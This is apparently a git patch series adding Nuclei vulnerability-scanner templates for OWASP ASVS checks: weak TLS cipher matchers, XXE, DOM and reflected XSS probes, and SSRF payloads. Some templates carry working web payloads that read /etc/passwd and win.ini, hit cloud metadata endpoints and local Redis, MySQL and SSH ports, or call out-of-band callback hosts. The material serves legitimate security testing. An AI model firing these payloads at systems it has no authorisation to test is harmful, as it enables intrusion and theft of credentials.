"TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls12 + max_version: tls12 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls13 + max_version: tls13 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or \ No newline at end of file From 02fe5750c4162b1b470aa73d4ba41777d55fc96e Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Tue, 23 Jul 2024 08:16:16 +0000 Subject: [PATCH 106/129] Create 5.5.2.yaml --- templates/dast/5.5.2.yaml | 62 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 templates/dast/5.5.2.yaml diff --git a/templates/dast/5.5.2.yaml b/templates/dast/5.5.2.yaml new file mode 100644 index 0000000..41cf1ee --- /dev/null +++ b/templates/dast/5.5.2.yaml @@ -0,0 +1,62 @@ +id: ASVS-4-0-3-V5-5-2 + +info: + name: ASVS 5.5.2 Check + author: AmirHossein Raeisi + severity: High + classification: + cwe-id: CWE-611 + reference: + - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xxe/generic-xxe.yaml + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection + tags: asvs,12.6.1 + description: | + Verify that the application correctly restricts XML parsers to only use the most restrictive configuration possible and to ensure that unsafe features such as resolving external entities are disabled to prevent XML eXternal Entity (XXE) attacks. + +variables: + rletter: "{{rand_base(6,'abc')}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + xxe: + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + + fuzzing: + - part: query + keys-regex: + - "(.*?)xml(.*?)" + fuzz: + - "{{xxe}}" + + - part: query + values: + - "(" + fuzz: + - "{{xxe}}" + + stop-at-first-match: true + matchers: + - type: regex + name: linux + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + name: windows + part: body + words: + - 'for 16-bit app support' + + - type: word + part: interactsh_protocol + words: + - "http" \ No newline at end of file From 0d7b739fe5cd94fb930f115a6284cbfb9ee5aa8b Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Tue, 30 Jul 2024 13:02:22 +0000 Subject: [PATCH 107/129] Add 5.3.3.1.yaml --- templates/dast/5.3.3.1.yaml | 54 +++++++++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 templates/dast/5.3.3.1.yaml diff --git a/templates/dast/5.3.3.1.yaml b/templates/dast/5.3.3.1.yaml new file mode 100644 index 0000000..f3fb1a5 --- /dev/null +++ b/templates/dast/5.3.3.1.yaml @@ -0,0 +1,54 @@ +id: ASVS-4-0-3-V5-3-3-1 + +info: + name: ASVS 5.3.3.1 (Dom-based XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/dom-xss.yaml + tags: asvs,5.3.3 + description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + num: "{{rand_int(10000, 99999)}}" +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

" + + - type: word + part: header + words: + - "text/html" \ No newline at end of file From 1287954afa27c2f8e297efe62aa6a9fa9f831f51 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Wed, 21 Aug 2024 15:23:08 +0000 Subject: [PATCH 108/129] Create 5.3.3.2.yaml --- templates/dast/5.3.3.2.yaml | 56 +++++++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 templates/dast/5.3.3.2.yaml diff --git a/templates/dast/5.3.3.2.yaml b/templates/dast/5.3.3.2.yaml new file mode 100644 index 0000000..fd92174 --- /dev/null +++ b/templates/dast/5.3.3.2.yaml @@ -0,0 +1,56 @@ +id: ASVS-4-0-3-V5-3-3-2 + +info: + name: ASVS 5.3.3.2 (Reflected XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/reflected-xss.yaml +tags: asvs,5.3.3 +description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + first: "{{rand_int(10000, 99999)}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + reflection: + - "'\"><{{first}}>" + - "'><{{first}}>" + - "\"><{{first}}>" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{reflection}}" + + - type: word + part: header + words: + - "text/html" \ No newline at end of file From 07d87a68b934ca6fb2db262b6ce5827f06a402a1 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 17:56:24 +0000 Subject: [PATCH 109/129] Update 5.3.3.1.yaml --- templates/{dast => headless}/5.3.3.1.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename templates/{dast => headless}/5.3.3.1.yaml (100%) diff --git a/templates/dast/5.3.3.1.yaml b/templates/headless/5.3.3.1.yaml similarity index 100% rename from templates/dast/5.3.3.1.yaml rename to templates/headless/5.3.3.1.yaml From bddd39cb956b5c0c5f3f1071bd307820e1f94acb Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 18:08:41 +0000 Subject: [PATCH 110/129] Create 5.2.6.yaml & Update 5.5.2.yaml --- templates/dast/5.2.6.yaml | 107 ++++++++++++++++++++++++++++++++++++++ templates/dast/5.5.2.yaml | 2 +- 2 files changed, 108 insertions(+), 1 deletion(-) create mode 100644 templates/dast/5.2.6.yaml diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml new file mode 100644 index 0000000..8eba52c --- /dev/null +++ b/templates/dast/5.2.6.yaml @@ -0,0 +1,107 @@ +id: id: ASVS-4-0-3-V5-2-6 + +info: + name: ASVS 5.2.6 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml + tags: asvs,5.2.6 + description: | + Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + ssrf: + - 'http://{{interactsh-url}}' + - 'http://{{FQDN}}.{{interactsh-url}}' + - 'http://{{FQDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{FQDN}}' + - 'http://{{RDN}}.{{interactsh-url}}' + - 'http://{{RDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{RDN}}' + - 'file:////./etc/./passwd' + - 'file:///c:/./windows/./win.ini' + - 'http://metadata.tencentyun.com/latest/meta-data/' + - 'http://100.100.100.200/latest/meta-data/' + - 'http://169.254.169.254/latest/meta-data/' + - 'http://169.254.169.254/metadata/v1' + - 'http://127.0.0.1:22' + - 'http://127.0.0.1:3306' + - 'dict://127.0.0.1:6379/info' + + fuzzing: + - part: query + mode: single + fuzz: + - "{{ssrf}}" + + - part: query + mode: single + values: + - "(https|http|file)(%3A%2F%2F|://)(.*?)" + fuzz: + - "{{ssrf}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: word + part: body + words: + - "Interactsh Server" + + - type: regex + part: body + regex: + - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' + + - type: regex + part: body + regex: + - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' + + - type: regex + part: body + regex: + - '(\d.\d.\d)(.*?)mysql_native_password' + + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - 'dns-conf\/[\s\S]+instance\/' + + - type: regex + part: body + regex: + - 'app-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'ami-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'id[\s\S]+interfaces\/' \ No newline at end of file diff --git a/templates/dast/5.5.2.yaml b/templates/dast/5.5.2.yaml index 41cf1ee..353012c 100644 --- a/templates/dast/5.5.2.yaml +++ b/templates/dast/5.5.2.yaml @@ -10,7 +10,7 @@ info: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xxe/generic-xxe.yaml - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection - tags: asvs,12.6.1 + tags: asvs,5.5.2 description: | Verify that the application correctly restricts XML parsers to only use the most restrictive configuration possible and to ensure that unsafe features such as resolving external entities are disabled to prevent XML eXternal Entity (XXE) attacks. From a5e2c4ed1c74289392130fd5c88c18285b471eac Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 18:37:29 +0000 Subject: [PATCH 111/129] Fix 5.2.6.yaml --- templates/dast/5.2.6.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml index 8eba52c..0158b63 100644 --- a/templates/dast/5.2.6.yaml +++ b/templates/dast/5.2.6.yaml @@ -1,4 +1,4 @@ -id: id: ASVS-4-0-3-V5-2-6 +id: ASVS-4-0-3-V5-2-6 info: name: ASVS 5.2.6 Check @@ -10,7 +10,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml - tags: asvs,5.2.6 + tags: asvs,5.2.6 description: | Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. @@ -45,10 +45,8 @@ http: fuzz: - "{{ssrf}}" - - part: query + - part: body mode: single - values: - - "(https|http|file)(%3A%2F%2F|://)(.*?)" fuzz: - "{{ssrf}}" From 3d5cb3d4da9d56e21fda1cfc5217467fcbe9c349 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 18:45:42 +0000 Subject: [PATCH 112/129] Fix 12.6.1.yaml --- templates/12.6.1.yaml | 124 +++++++++++------------------------------- 1 file changed, 33 insertions(+), 91 deletions(-) diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml index bc6f561..1e1ce42 100644 --- a/templates/12.6.1.yaml +++ b/templates/12.6.1.yaml @@ -9,106 +9,48 @@ info: reference: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/blind-ssrf.yaml - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html tags: asvs,12.6.1 description: | Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. -variables: - whiltelist_host: "http://google.com" - server_file: "file:///etc/passwd" - restricted_path: "/admin" - restricted_path_keyword: "Welcom to Admin Panel" - -requests: - - raw: - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"{{server_file}}"} - - stop-at-first-match: true - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - - raw: - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"http://{{interactsh-url}}"} - - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"{{whiltelist_host}}.{{interactsh-url}}"} - - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"{{whiltelist_host}}@{{interactsh-url}}"} - - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"http://{{interactsh-url}}#{{whiltelist_host}}"} - - stop-at-first-match: true - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - - - raw: - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"http://{{localips}}/admin"} +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' payloads: - localips: - - 